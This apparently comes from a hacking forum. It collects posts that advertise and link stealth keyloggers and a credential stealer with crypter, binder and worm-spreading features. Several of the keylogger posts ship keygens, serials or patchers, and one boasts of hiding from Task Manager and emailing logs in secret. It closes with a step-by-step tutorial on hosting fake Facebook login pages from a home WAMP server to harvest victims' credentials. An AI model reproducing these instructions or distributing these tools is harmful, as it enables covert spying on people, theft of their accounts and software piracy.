▲▲ Unique Mutex Generation to prevent numerous instances of the same program running on the same machine
▲▲ Randomized string replacement
▲▲ CodeDOM: generates random needed strings, and variables on Runtime to increase uniqueness.
▲▲ Private Keystroke Parsing method meaning extremely clear, and readable logs!
▲▲ Extremely cheap prices
▲▲ Amazing features
▲▲ FUD Binder
▲▲ FUD Multi Downloader
▲▲ FireFox stealers + 10 others!
▲▲ .NET Coded
▲▲ Lowest Dependencies Needed 2.0 Framework
▲▲ Built in auto worm spreaders MSN, Facebook, Youtube, USB, LAN + More!
▲▲ Can be as SIMPLE & NOOB FRIENDLY as you want, or as ADVANCED as you want it to be!
▲▲ SUPER STABLE
▲▲ External AND Internal File Pumper
▲▲ FTP & SMTP Logging options
▲▲ Customize your Logging Intervals even down to the seconds
▲▲ HWID Supported
▲▲ USG
▲▲ Unlimited Amt File Downloader
▲▲ Unlimited Amt File Binder
▲▲ File extension spoofer
▲▲ Built in RT/ST FUD CRYPTER
▲▲ Not sure if Xenon has a feature? PM me us, and ask!
▲▲ + MUCH MUCH MORE!

SOME FEATURES MAY HAVE BEEN TAKEN OUT/OR BE DEAD. AS THIS GOT RELEASED AS A FREE VERSION AFTER SOMETIME. SO NOT ALL FEATURES MIGHT NOR BE THERE :) JUST FYI

No password, old one was hard as fuck to decrypt so meh

Enjoy, and post feedback

Simple Keylogger v1.0.8


[Image: wsNSe.png]

Our application allows you to monitor the activities of every key stroke pressed at your computer.
Using our application you will find out exactly what the target user is doing on your computer.
This application has been used to monitor kids from child predators, increase security on the computer, increase productivity at work, and much more.

Install : Enjoy ^^

1) Unpack and install.
2) Use the key generator to generate a valid serial.
3) Enjoy this release!

NOTE : WoW

For obvious reasons you should always make sure that the title is restricted access to internet by a firewall to avoid any problems.
Further, when running our keygens/patches you might need to run it with admin rights while in Vista/Win7 to ensure that it has enough privileges.

NFO : Linezer0

Virus Scan : Setup

http://virusscan.jotti.org/en/scanresult...ece8c13932

Virus Scan : Keygen

http://virusscan.jotti.org/en/scanresult...1a3c68ea65

RLZ : Simple.Keylogger.v1.0.8.Incl.Keygen-Lz0

UpLoaded

http://ul.to/g8k7h1bq

Ardamax Keylogger v3.7_Full(With Serial)


Hey Guys Its my First Software Post So Here is what i tolled you in the Subject

Ardamax keylogger
Mirror 1

alternative http://www.ziddu.com/download/15068817/A...l.rar.html

by SATAFF



And Here is the Virus Scan report


Virus Scan Report
[/code]File Info

Report date: 2011-05-21 11:00:22 (GMT 1)
File name: ardamax-keylogger-v3-7-serial-
File size: 1008545 bytes
MD5 Hash: 0c4492269b7d4e3a6d97370885f0b110
SHA1 Hash: 5a7fac4e40b12670996ba969d8c36989eff1d616
Detection rate: 0 on 6 (0%)
Status: CLEAN

Detections

AVG -
Avira AntiVir -
ClamAV -
Emsisoft -
TrendMicro -
Zoner - 

Hacking Utilities Pack


This is a hacking utilities pack compiled by me into a nice auto run application with installation menu for the different hack tools/software. Its 32mb so i struggled to find an online av scanner. I realy tried. But i assure u all that i checked and then double checked every single file in this pack with Avast Pro 5, DrWeb Curit and Malwarebytes's Anti malware premium. u can do a scan yourself after downloading it and see for yourself. It took me quite a bit of time putting this whole thing together and i wouldnt go through all that just to spread a virus. if any staff or admins know of somewhere to scan such a big file, please let me know and i will happily do it. Here is a screen shot of what the final product looks like. I just wanted to make it easy to use and install. Enjoy, and please let me know what u think.
[Image: screenshot.jpg]

Download here

A SIMPLE "THANX" CAN GO A LONG WAY. PLEASE SAY THANX IF U FOUND THIS USEFULL <

Family.Keylogger.Pro.v4.6.WinALL.Incl.Patcher


[Image: 1607pt6f4b130.png]

Information: 
http://www.google.com

[Image: 170_1.gif]
http://rapidgator.net/file/6267528/Family.Keylogger.Pro.v4.6.WinALL.Incl.Pa....html

[Image: yellow-left.png]
http://www.filefactory.com/file/9ff5oxcgryv/n/Family_Keylogger_Pro_v4_6_WinALL_Incl_Patcher-YPOGEiOS_ra

iSafe Keylogger v3.0.2



[Image: 88cecba285.png]

Quote:All-in-one-Record all computer activities, including:keystrokes,screenshots,websites surfed,microphone,Facebook,Myspace,clipboard,application used,USB Drive(Disk),CDRom,Printer,Documents used,2-Direction IM chatting(MSN,ICQ,AIM,Yahoo Messenger,Skype Incoming-and-Outgoing messages)...
Stealth-Work in completely Stealth(invisible,secretly) mode
Safe-All records are highly encrypted with AES 1024,no one but you can view or manage the logs
Secret-Completely self-hide. Not listed in Task Manager,Taskbar,Uninstall list and Start menu.Can not be detected by Registry clean or optimization tools or Windows' msconfig.exe
Live-Send logs timely to your E-mail address in background
Powerful,Easy-to-Use,High Efficiency,Convenient Log-View-and-Management Tool
Life-time FREE technical Support...
Compatible with Windows 7

[Image: 170_1.gif]
http://rapidgator.net/file/7065772/ISf_v3.0.2.rar.html
Password: saltishboy

Hack facebook from ur home!!! no hosting needed



Most people do complain that their phishing pages do get ban soon cause
they are uploading lot of illegal stuff, cause phishing is illeagal :D.

For all of you guys i have a solution. That is setting up a server on your computer and hosting your phishing pages there.

1.First of all download the wamp server.

http://www.wampserver.com/

2.And install it to where ever you want. C: or E:. When you are installing it you will be asked to allow the program through the firewall, and make sure to port-forward your router port 80.

3.Once you install it you will see an icon on the task bar (WAMP server)
click it and press put online, or else start all services.

4.I did download phishing package using this site, i keep saying this is not my site, if you have the phishing package you can use that.
The package includes the fake facebook page, and the tabnabbing java script and the Facebook career page.

http://www.101hacker.com/search?q=tabnabbing

5.Now go to the wamp installation directory and go to www folder,
there will be two files called index.php and testmysql.php delete those files or cut those files and save them in somewhere else.(doesn't matter).

6.Inside the folder paste your phishing files (to me it will be above three files) and you are done.

7.To access the page from your local connection type
http://localhost/Facebook.html the page name could differ it is up to u.

8. Using this method you and your local area mates could access the page, type the credentials and type enter, and go to the wamp directory and go to the www folder you will see a text file called log
and open it, you will see the credentials viola!!!! .

9.Now how would your WAN mates access this it is easy as you like,
type htttp://your public ip/Facebook.html
go to whatismyip.com to find your public ip.

10. Don't try this in your computer because most routers won't support
loop back so use a proxy server to test this or give the link to a friend. It would work as the same u will get the credentials as before nice and dry. :D

11. you also could use no-ip behalf of ur public ip if you have a dynamic ip.

So i think this is enough!!! think i did explained ok :D cause this is my first TUT. happy hacking guys!!!! pm me if you have any troubles